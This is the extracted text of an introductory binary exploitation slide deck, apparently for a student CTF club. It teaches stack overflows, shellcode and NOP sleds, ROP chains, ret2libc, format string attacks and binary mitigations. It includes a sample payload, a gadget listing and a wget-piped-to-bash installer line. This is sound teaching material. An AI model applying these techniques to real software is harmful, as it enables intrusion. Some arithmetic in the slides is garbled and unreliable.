JavaScript isn't enabled in your browser, so this file can't be opened. Enable and reload.

1 of 79

Intro to Binary Exploitation

(pwn)

2 of 79

The Stack

3 of 79

Stack Basics

The stack is for static memory allocation

grows down

The heap is for dynamic memory allocation

grows up

4 of 79

Call Stack Basics

This is generally how the call stack works for an x86 computer
Call stack layout for upward-growing stacks after the DrawSquare subroutine (shown in blue) called DrawLine (shown in green), which is the currently executing routine

5 of 79

Buffer Overflow

(bof)

6 of 79

7 of 79

Buffer Overflow

a buffer is just region of memory you put stuff in
a buffer is overflowed when you write past the end of the buffer
commonly a result of improper handling of user input
programming errors can allow the user to input more than there is space for

8 of 79

… why not just use strings?

for example, why not (Python) user_input = input('enter a string: ') ?
strings are actually more complicated than they seem
a lot of work is being done under the hood to allocate a buffer of the appropriate size and keep track of it
a low-level language like C does not do this for you

9 of 79

ok so what?

what happens if we overflow a buffer on the stack?
what important things are on the stack?
let's run (break) some sample code

10 of 79

ok so what?

11 of 79

how did that happen?

When we input data that is longer than the allocated memory for the buffer, it can overwrite important stuff eg.

other variables on the stack
the base pointer
the return address

NOTE: If we can overwrite the return address, we can control which function we return to when we finish with the current one

usually we return to whichever function called it

12 of 79

we can do more!

so, we just saw that we can overwrite local variables
this is already pretty dangerous, since we can edit variables we're not supposed to be able to touch
what else is on the stack?

13 of 79

ok so what?

Payload

Random bytes until we get to what we want to overwrite
B\x11@\x00\x00\x00\x00\x00

address of "interesting_function" packed as a 64-bit int (for a 64-bit program)

14 of 79

making pwn easier - pwntools

pwntools

framework for quickly making exploits
has tonsssss of features for pwn

documentation:

https://docs.pwntools.com/

tutorials:

https://github.com/Gallopsled/pwntools-tutorial#readme

python3 -m pip install pwntools

15 of 79

pwntools basics

This is how we can exploit the previous program

This is most of the functionality you will need from pwntools for most exploits

16 of 79

making pwn easier - gef

GDB plugin
Provides really useful features specifically for binary reversing and exploitation

https://github.com/hugsy/gef

INSTALL:� bash -c "$(wget https://gef.blah.cat/sh -O -)"

there are alternatives to GEF but GEF is better bc its easier

17 of 79

gdb/gef basics - where do I set my breakpoint?

18 of 79

gdb/gef basics - where do I set my breakpoint?

19 of 79

gdb/gef basics - how do I find the offset?

The offset is 0x7fffffffdfb8 - 0x7fffffffdf90 = 0x28 = 0x40

because we want to figure out how much data to input to get to the instruction pointer
if we can overwrite (control) the instruction pointer (rip), we can control what the program does

20 of 79

gdb/gef basics - how do I find the offset?

This is the stack

Notice our input is at offset 0x0 and the return address is at offset 0x28

offset is still 0x28

The offset is 0x7fffffffdfb8 - 0x7fffffffdf90 = 0x28 = 0x40

because we want to figure out how much data to input to get to the instruction pointer
if we can overwrite (control) the instruction pointer (rip), we can control what the program does

21 of 79

buffer overflow on the stack is powerful

we can change variable values
we can redirect program execution
we can (almost) run any code we want

on 32-bit x86, control of the stack means we can call any function with any arguments

some interesting things to note:

not only can we jump to functions, but we can also jump to the middle of functions
you can jump to any instruction you want (assuming proper register setup)
you can even jump to the middle of instructions on x86 and amd64

remember, instructions are just a bunch of bits

22 of 79

buffer overflow can also mean reading data

23 of 79

Shellcode

sally sells seashells by the sea shore sally sells seashells by the sea shore sally sells seashells by the

24 of 79

executable stack???

The stack is writable bc we need to put stuff on there while running
Sometimes it is (but shouldn't be) executable too though!

maybe we can write code (assembly) onto the stack and execute it!!

25 of 79

writing (and understanding shellcode)

What do I need?

clean up registers

some registers need to be clear before running functions

this is according to the calling conventions

populate registers

if you want to run "/bin/sh", you need to find that string somewhere

set up your stack
make a syscall

26 of 79

example shellcode for running /bin/sh

27 of 79

calling execve - explained

28 of 79

example shellcode stack

29 of 79

luckily - we can steal shellcode!

http://shell-storm.org/shellcode/index.html

30 of 79

how to exploit?

locate where the shellcode will execute from
write the shellcode to that location and execute it

sometimes pwntools has good shellcode premade

31 of 79

what if I don't know where my shellcode will execute?

nops!

nops = no ops = no operations
0x90 is the assembly code for the "nop" instruction

we can fill the stack with a bunch of nops and then have the shellcode afterwards

this is called a "nop sled"

that way, a bunch of empty code gets executed before the real code

32 of 79

33 of 79

sometimes shellcode is a little more complicated

this is something you figure out over time with practice

34 of 79

pro tips

you cannot have any null bytes (0x00) in your shellcode, because null bytes terminate strings, and thus would cut off your shellcode

- mov ebx, 0

this instruction contains nulls (0)

- xor ebx, ebx

this instruction doesn't but does the same thing

- mov eax, 1

this instruction contains nulls because eax is a 32-bit register

-mov al, 1

this instruction doesn't because al is the lower 8 bits of the eax register

You can write C code disassemble it to see what assembly is used to do what you want. Clean it up, extract the assembly, and write your shellcode
You can always steal shellcode, debug it, and modify it

35 of 79

ROP Gadgets

Rop Rop Rop - Rop to the Top

36 of 79

37 of 79

Basic Buffer Overflow is limited

we looked at buffer overflows and what you can do with them

overwrite locals
return to functions

we are missing some things though…
our examples were a bit contrived

are we really going to have an "interesting_function" irl?

we want to be able to run anything!

38 of 79

interesting_function is rare

there will almost never be a function that just does everything you want
a developer is not going to leave an unused function that gives you a shell for free
a bit like taping your house key to the front door

39 of 79

can't we just return to assembly?

this attack used to work, but nowadays it does not

most memory now has proper permissions (stack shouldn't be executable)

remember memory maps?

40 of 79

memory is never write + execute

gef➤ vmmap

[ Legend: Code | Heap | Stack ]

Start End Offset Perm Path

0x0000555555554000 0x0000555555555000 0x0000000000000000 r-- /my-program

0x0000555555555000 0x0000555555556000 0x0000000000001000 r-x /my-program

0x0000555555556000 0x0000555555557000 0x0000000000002000 r-- /my-program

0x0000555555557000 0x0000555555558000 0x0000000000002000 r-- /my-program

0x0000555555558000 0x0000555555559000 0x0000000000003000 rw- /my-program

0x0000555555559000 0x000055555557a000 0x0000000000000000 rw- [heap]

0x00007ffff7dbc000 0x00007ffff7dde000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so

0x00007ffff7dde000 0x00007ffff7f56000 0x0000000000022000 r-x /usr/lib/x86_64-linux-gnu/libc-2.31.so

0x00007ffff7f56000 0x00007ffff7fa4000 0x000000000019a000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so

0x00007ffff7fa4000 0x00007ffff7fa8000 0x00000000001e7000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so

0x00007ffff7fa8000 0x00007ffff7faa000 0x00000000001eb000 rw- /usr/lib/x86_64-linux-gnu/libc-2.31.so

0x00007ffff7faa000 0x00007ffff7fb0000 0x0000000000000000 rw-

0x00007ffff7fca000 0x00007ffff7fce000 0x0000000000000000 r-- [vvar]

0x00007ffff7fce000 0x00007ffff7fcf000 0x0000000000000000 r-x [vdso]

0x00007ffff7fcf000 0x00007ffff7fd0000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so

0x00007ffff7fd0000 0x00007ffff7ff3000 0x0000000000001000 r-x /usr/lib/x86_64-linux-gnu/ld-2.31.so

0x00007ffff7ff3000 0x00007ffff7ffb000 0x0000000000024000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so

0x00007ffff7ffc000 0x00007ffff7ffd000 0x000000000002c000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so

0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002d000 rw- /usr/lib/x86_64-linux-gnu/ld-2.31.so

0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-

0x00007ffffffdd000 0x00007ffffffff000 0x0000000000000000 rw- [stack]

Binary

Shared Libraries

Dynamic Loader

41 of 79

DEP means no jumping to shellcode

Data Execution Prevention (DEP) or Write XOR Execute (W ^ X)
no memory is ever simultaneously writable and executable

https://twitter.com/gf_256/status/1376947885569413121

42 of 79

do we need new instructions?

we can't make new functionality, but we can make use of existing functionality
we already saw that we can call functions, but controlling registers would be helpful (especially on 64-bit where function arguments are in registers)
if we look through the code sections, we can find some useful sequences of instructions that end in ret
each one of these is called a gadget
we can chain gadgets together to do useful things
this is called Return Oriented Programming (ROP)

43 of 79

Useful Info - The GOT & PLT

When we compile a program, we usually reuse code from a library of C functions (libc)

We "dynamically link" the library to our program so whenever the program runs, it can refer to the libc on someone's computer instead of having to include all the functions in the program
this saves space

The GOT - Global Offset Table

A section inside the program that holds addresses of functions that are dynamically linked
Unless the binary is marked as Full RELRO (more on this later), these functions are only resolved to an address once called

The PLT - Procedure Linkage Table

Before function addresses have been resolved, the GOT points to an entry in the PLT
This allows for calling the dynamic linker with the name of the function that should be resolved

44 of 79

$ ROPgadget --binary prog

Gadgets information

============================================================

0x00000000004010bd : add ah, dh ; nop ; endbr64 ; ret

0x00000000004010eb : add bh, bh ; loopne 0x401155 ; nop ; ret

...

0x000000000040124c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

0x000000000040124e : pop r13 ; pop r14 ; pop r15 ; ret

0x0000000000401250 : pop r14 ; pop r15 ; ret

0x0000000000401252 : pop r15 ; ret

0x000000000040124b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

0x000000000040124f : pop rbp ; pop r14 ; pop r15 ; ret

0x000000000040115d : pop rbp ; ret

0x0000000000401253 : pop rdi ; ret

0x0000000000401251 : pop rsi ; pop r15 ; ret

0x000000000040124d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret

0x000000000040101a : ret

...

45 of 79

quick example…

I want to call function(42, 1337)

rdi = 42, rsi = 1337, return to function

can use these two gadgets�0x401253 : pop rdi ; ret�0x401251 : pop rsi ; pop r15 ; ret
notice all gadgets have to end with the "ret" instruction
follow the stack pointer and what instructions we are executing

…AAAAAAAA
0x401253
42
0x401251
1337
(don't care)
function
…

46 of 79

how do I exploit this?

47 of 79

short aside on stack alignment

some instructions (particularly movaps) crash the program if the memory operand is not 16-byte aligned

library functions on some systems, especially Ubuntu, tend to use this instruction for speed

this is usually the case, but might not be true when doing ROP
if your ROP chain has an odd number of addresses/numbers before returning to a function that uses movaps, the function won't work properly :(
solution: insert a ret gadget before returning to this function to pad your ROP chain to an even number of things
this is a bit advanced so talk to me if you don't understand

48 of 79

49 of 79

Return to libc

(ret2libc)

50 of 79

51 of 79

We are almost there!

with buffer overflow, we can overwrite locals and call functions
with ROP gadgets, we can control function arguments too
now… where do we go?

52 of 79

Where are the library functions?

functions like printf and fgets are very common
they exist in a shared library instead of the binary itself

this is unless the program is statically linked

when the program starts, the shared library is mapped into memory so the binary can use it

53 of 79

Why can't we just call system?

system("/bin/sh") would give us a shell very easily
system is in libc, so can we just call it?
no! Address Space Layout Randomization (ASLR) prevents this by loading shared libraries at random addresses

54 of 79

How can we use the PLT & GOT?

the GOT is like an array of function pointers to the libc functions that the binary needs
when the binary needs to call a library function, it calls the PLT instead
each GOT entry initially points to a resolver routine, and is then overwritten to the real function address for subsequent calls

55 of 79

How can we do it?

randomization is not per-function
the entire libc is loaded as a block at a random address
if we can leak a libc address, then we can calculate the base address of libc and also the address of anything in libc

basically, if we know where one libc function is, we know where all of them are

56 of 79

Two-step attack plan:

the first ROP chain should leak a libc address, then return back to main so we can attack the program again
with the address of libc known, the second ROP chain can simply call system("/bin/sh") (the "/bin/sh" string exists in libc as well)

57 of 79

Step 1: libc leak

if the program prints anything, then printing functions will be in the PLT so we can call them without a libc leak
the argument can be any address containing a libc address
we can leak a libc address from the GOT since we know where it is

58 of 79

Step 2: returning into libc

find the address of system and "/bin/sh" in libc
return to system("/bin/sh")

59 of 79

Example Ret2Libc

Find libc and load binaries
Find the address of puts & "/bin/sh" in the binary
Find the address of puts in libc
Calculate the offset between the 2 puts functions
Use the offset to call system() with the "/bin/sh" string

60 of 79

Format Strings

(printf)

61 of 79

printf primer

int printf(const char *format, ...);
first argument is NOT the "string to print"
first argument is a format string controlling what printf does
related functions fprintf, dprintf, sprintf, snprintf do similar things

Hi my name is adam

100 64

0x55d2cd15a2a0 adam

62 of 79

63 of 79

man 3 printf

64 of 79

User-controlled format string

what if we (attackers) control the format string?
what can we do with printf(user_input)
we can put in format specifiers that change what printf does!

65 of 79

Stack Leaking

how does printf know how many arguments it needs to print?
recall that arguments are on the stack

on 64-bit, the first six arguments are in registers, but further arguments are on the stack

the %n$specifier will be very helpful
what happens when if we do printf("%42$p")?
main returns to __libc_start_main, so that return address can be leaked to get a libc leak

66 of 79

Memory Writing

the special %n specifier writes the number of bytes written so far
corresponding argument is a pointer
it's only useful in niche situations
for attackers, it is very powerful

we won't cover specifics today though

we can write to any pointer on the stack already

adam thonk

67 of 79

How to get the pointer?

we can write to any pointer on the stack
how do we get that pointer in the first place?
if there's an input buffer on the stack, then we can just put a pointer there
otherwise we need to be more creative

68 of 79

What to overwrite?

a good choice is the GOT
remember that library functions through the PLT call function pointers in the GOT
if we overwrite a GOT entry with some address, then calls to the corresponding function will instead jump to that address

69 of 79

Be creative!

format string vulnerabilities can be tricky
input buffer not on stack
limited buffer size (so limited format string size)
only one call to printf
etc…

70 of 79

how do we exploit?

71 of 79

Binary Security

checksec

72 of 79

pwntools has a tool called checksec which can check security on a binary

73 of 79

NX (remember this?)

NX - NonExecutable
Changed permissions on the stack

Memory should be writable or executable but not both

When NX is enabled, we cannot use shellcode

this is enabled with 1 (one) bit in the binary
Use ROP instead

74 of 79

RELRO (remember this?)

RELRO - Relocation Read-Only

Security Measure that makes some sections of the binary read-only

Partial RELRO (default with GCC)

This doesn't really do much to prevent an attack.
Forces the GOT to come before a section of memory called the BSS

This prevents buffer overflows on a global variable from overwriting the GOT

We rarely use Global Variables

Full RELRO

Makes the entire GOT read-only, meaning you can't overwrite addresses in the GOT

This can make a lot of ROP much harder

75 of 79

PIE

PIE - Position Independent Executable

Every time you load the binary, it gets loaded into a different memory address
This means we can't use static addresses like we did in the example

need to leek an address and then use it as an offset to do our exploits

We can leak addresses with format strings vulnerabilities, buffer overflows…

76 of 79

Stack Canaries (Stack Cookies)

This is the idea that we can add a small chunk of memory in the stack between a buffer and the instruction pointer with a value
When we overflow, we change all the info between a buffer and instruction pointer
Thus, if the "canary" is changed before returning, we know someone tried a buffer overflow

You can bypass by leaking the canary and rewriting it onto the stack

77 of 79

Final Thoughts

78 of 79

Final Thoughts

Binary exploitation is a complicated topic and needs a good amount of practice before it can be done easily
There are also plenty more exploitation techniques (eg. heap and kernel exploitation) or more advanced offshoots of what we discussed.

Practice!

79 of 79

Resources

LiveOverflow's Pwn YouTube Series
My Collection of Pwn Challenges and Writeups
My CTF Cheat Sheet and Resource List
Nightmare

made by the guy who was at the gbm last week